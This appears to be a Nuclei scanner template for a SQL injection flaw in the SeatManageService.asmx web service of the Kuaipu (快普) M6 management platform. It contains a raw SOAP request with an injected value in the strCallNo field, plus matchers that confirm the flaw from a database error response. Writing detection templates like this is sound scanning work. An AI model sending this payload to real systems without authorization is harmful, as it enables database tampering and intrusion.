id: philip-m6-SeatManageService-sqli
info:
  name: 快普M6 WebService/SeatManageService.asmx SQL注入漏洞
  author: leadlife
  severity: high
  description: 快普M6整合管理平台的WebService/SeatManageService.asmx接口下存在SQL注入漏洞。攻击者可通过构造恶意SQL语句，绕过参数过滤机制，实现对数据库的任意查询、修改或删除操作，甚至可能获取系统控制权限。
  reference: 
    - https://www.yuque.com/lvguo-pibd8/fqbwsx/msh6233nqo575dhe
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    version:
  tags: philip,sqli,philipm6

http:
  - raw:
      - |
        POST /WebService/SeatManageService.asmx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
        Content-Type: application/soap+xml;charset=UTF-8;action="http://tempuri.org/GetCallInfo"
        Content-Length: 300

        <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
          <soap:Header/>
          <soap:Body>
              <tem:GetCallInfo>
                <!--Optional:-->
                <tem:strCallNo>'-1/user--</tem:strCallNo>
              </tem:GetCallInfo>
          </soap:Body>
        </soap:Envelope>

    matchers:
      - type: dsl
        dsl:
          - status_code == 500
          - contains_all(body,'varchar')
        condition: and